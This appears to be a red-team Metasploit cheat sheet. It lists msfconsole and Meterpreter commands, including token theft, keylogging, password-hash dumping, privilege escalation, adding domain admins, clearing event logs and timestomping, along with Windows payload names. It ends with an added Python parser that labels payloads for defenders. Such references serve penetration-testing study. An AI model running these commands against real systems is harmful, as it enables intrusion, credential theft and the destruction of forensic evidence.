Metasploit Cheat Sheet

This entry is part 3 of 7 in the series Red Team Engagements


MSFconsole Commands

| Command | Description |
| --- | --- |
| `show exploits` | Show all exploits within the Framework. |
| `show payloads` | Show all payloads within the Framework. |
| `grep meterpreter show payloads` | Search for a specific payload: filter the payload list to entries containing "meterpreter". |
| `grep meterpreter grep reverse_tcp show payloads` | Search for a specific payload by chaining filters: only payloads containing both "meterpreter" and "reverse_tcp". |
| `show auxiliary` | Show all auxiliary modules within the Framework. |
| `search <name>` | Search for exploits or modules within the Framework. |
| `info` | Load information about a specific exploit or module. |
| `use <name>` | Load an exploit or module (example: `use windows/smb/psexec`). |
| `use <number>` | Load an exploit by using the index number displayed after the search command. |
| `LHOST` | Your local host's IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells. |
| `RHOST` | The remote host or the target. |
| `set <function>` | Set a specific value (for example, LHOST or RHOST). |
| `setg <function>` | Set a specific value globally (for example, LHOST or RHOST). |
| `show options` | Show the options available for a module or exploit. |
| `show targets` | Show the platforms supported by the exploit. |
| `set target <number>` | Specify a specific target index if you know the OS and service pack. |
| `set payload <payload>` | Specify the payload to use. |
| `set payload <number>` | Specify the payload index number to use after the show payloads command. |
| `show advanced` | Show advanced options. |
| `set autorunscript migrate -f` | Automatically migrate to a separate process upon exploit completion. |
| `check` | Determine whether a target is vulnerable to an attack. |
| `exploit` | Execute the module or exploit and attack the target. |
| `exploit -j` | Run the exploit under the context of a job (this runs the exploit in the background). |
| `exploit -z` | Do not interact with the session after successful exploitation. |
| `exploit -e <encoder>` | Specify the payload encoder to use (example: `exploit -e shikata_ga_nai`). |
| `exploit -h` | Display help for the exploit command. |
| `sessions -l` | List available sessions (used when handling multiple shells). |
| `sessions -l -v` | List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system. |
| `sessions -s <script>` | Run a specific Meterpreter script on all live Meterpreter sessions. |
| `sessions -K` | Kill all live sessions. |
| `sessions -c <cmd>` | Execute a command on all live Meterpreter sessions. |
| `sessions -u <sessionID>` | Upgrade a normal Win32 shell to a Meterpreter console. |
| `db_create <name>` | Create a database to use with database-driven attacks (example: `db_create autopwn`). |
| `db_connect <name>` | Create and connect to a database for database-driven attacks (example: `db_connect autopwn`). |
| `db_nmap` | Run Nmap and place the results in the database (normal Nmap syntax is supported, such as `-sT -v -P0`). |
| `db_destroy` | Delete the current database. |
| `db_destroy <user:password@host:port/database>` | Delete a database using advanced options. |

Meterpreter Commands

| Command | Description |
| --- | --- |
| `help` | Open Meterpreter usage help. |
| `run <scriptname>` | Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory. |
| `sysinfo` | Show the system information on the compromised target. |
| `ls` | List the files and folders on the target. |
| `use priv` | Load the privilege extension for extended Meterpreter libraries. |
| `ps` | Show all running processes and which accounts are associated with each process. |
| `migrate <proc. id>` | Migrate to the specific process ID (PID is the target process ID obtained from the ps command). |
| `use incognito` | Load incognito functions (used for token stealing and impersonation on a target machine). |
| `list_tokens -u` | List available tokens on the target by user. |
| `list_tokens -g` | List available tokens on the target by group. |
| `impersonate_token <DOMAIN_NAME\USERNAME>` | Impersonate a token available on the target. |
| `steal_token <proc. id>` | Steal the tokens available for a given process and impersonate that token. |
| `drop_token` | Stop impersonating the current token. |
| `getsystem` | Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors. |
| `shell` | Drop into an interactive shell with all available tokens. |
| `execute -f <cmd.exe> -i` | Execute cmd.exe and interact with it. |
| `execute -f <cmd.exe> -i -t` | Execute cmd.exe with all available tokens. |
| `execute -f <cmd.exe> -i -H -t` | Execute cmd.exe with all available tokens and make it a hidden process. |
| `rev2self` | Revert to the original user you used to compromise the target. |
| `reg <command>` | Interact with the target's registry: create, delete, query, set, and much more. |
| `setdesktop <number>` | Switch to a different screen based on who is logged in. |
| `screenshot` | Take a screenshot of the target's screen. |
| `upload <filename>` | Upload a file to the target. |
| `download <filename>` | Download a file from the target. |
| `keyscan_start` | Start sniffing keystrokes on the remote target. |
| `keyscan_dump` | Dump the remote keys captured on the target. |
| `keyscan_stop` | Stop sniffing keystrokes on the remote target. |
| `getprivs` | Get as many privileges as possible on the target. |
| `uictl enable <keyboard/mouse>` | Take control of the keyboard and/or mouse. |
| `background` | Run your current Meterpreter shell in the background. |
| `hashdump` | Dump all hashes on the target. |
| `use sniffer` | Load the sniffer module. |
| `sniffer_interfaces` | List the available interfaces on the target. |
| `sniffer_dump <interfaceID> pcapname` | Start sniffing on the remote target. |
| `sniffer_start <interfaceID> packet-buffer` | Start sniffing with a specific range for a packet buffer. |
| `sniffer_stats <interfaceID>` | Grab statistical information from the interface you are sniffing. |
| `sniffer_stop <interfaceID>` | Stop the sniffer. |
| `add_user <username> <password> -h <ip>` | Add a user on the remote target. |
| `add_group_user <"Domain Admins"> <username> -h <ip>` | Add a username to the Domain Administrators group on the remote target. |
| `clearev` | Clear the event log on the target machine. |
| `timestomp` | Change file attributes, such as creation date (anti-forensics measure). |
| `reboot` | Reboot the target machine. |

MSF – Payload Types (Windows)

The table below contains the most common payloads used for Windows machines and their respective descriptions.

| Payload | Description |
| --- | --- |
| `generic/custom` | Generic listener, multi-use |
| `generic/shell_bind_tcp` | Generic listener, multi-use, normal shell, TCP connection binding |
| `generic/shell_reverse_tcp` | Generic listener, multi-use, normal shell, reverse TCP connection |
| `windows/x64/exec` | Executes an arbitrary command (Windows x64) |
| `windows/x64/loadlibrary` | Loads an arbitrary x64 library path |
| `windows/x64/messagebox` | Spawns a dialog via MessageBox using a customizable title, text and icon |
| `windows/x64/shell_reverse_tcp` | Normal shell, single payload, reverse TCP connection |
| `windows/x64/shell/reverse_tcp` | Normal shell, stager + stage, reverse TCP connection |
| `windows/x64/shell/bind_ipv6_tcp` | Normal shell, stager + stage, IPv6 bind TCP stager |
| `windows/x64/meterpreter/$` | Meterpreter payload + varieties above |
| `windows/x64/powershell/$` | Interactive PowerShell sessions + varieties above |
| `windows/x64/vncinject/$` | VNC server (reflective injection) + varieties above |
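The naming convention the table illustrates (single vs. staged, bind vs. reverse), as an added Python example that is not part of the original cheat sheet or of Metasploit itself: a small parser that labels a payload path with its platform, architecture, kind, staging model and connection direction, for instance to tag payload names found in listener configuration or logs consistently. The names `parse_payload`, `direction` and `PayloadInfo`, and the naming rules they encode, are assumptions derived from the table, not Metasploit's own API.

```python
"""Label Metasploit payload names of the form listed in the table above.

Assumed naming rules (the ones the table illustrates): "kind/connector"
(shell/reverse_tcp) is a staged payload, "kind_connector" (shell_reverse_tcp)
is a single payload, and a trailing "$" stands for any connector variety.
"""
from dataclasses import dataclass
from typing import Optional

ARCHES = {"x64", "x86"}  # architecture segment, present in windows/* paths


@dataclass
class PayloadInfo:
    platform: str             # "generic", "windows", ...
    arch: Optional[str]       # "x64", "x86", or None if absent from the path
    kind: str                 # "shell", "meterpreter", "exec", ...
    staged: bool              # True for stager + stage (kind/connector form)
    connector: Optional[str]  # "reverse_tcp", "bind_ipv6_tcp", ... or None


def parse_payload(name: str) -> PayloadInfo:
    parts = name.strip().split("/")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest and rest[0] in ARCHES else None
    if not platform or not rest or not all(rest) or len(rest) > 2:
        raise ValueError(f"unrecognised payload path: {name!r}")
    if len(rest) == 2:  # staged form: kind/connector
        kind, connector = rest
        return PayloadInfo(platform, arch, kind, True,
                           None if connector == "$" else connector)
    token = rest[0]     # single form: kind_connector, or a bare kind like exec
    for marker in ("_reverse_", "_bind_"):
        i = token.find(marker)
        if i != -1:
            return PayloadInfo(platform, arch, token[:i], False, token[i + 1:])
    return PayloadInfo(platform, arch, token, False, None)


def direction(info: PayloadInfo) -> Optional[str]:
    """Which side opens the connection: 'outbound' for reverse connectors
    (target connects back to LHOST), 'inbound' for bind connectors (target
    listens), None for payloads with no network connector at all."""
    if info.connector is None:
        return None
    return "outbound" if info.connector.startswith("reverse_") else "inbound"
```

For a defender the `direction` label is the useful part: reverse payloads show up as new outbound connections from the host, bind payloads as a new listening port.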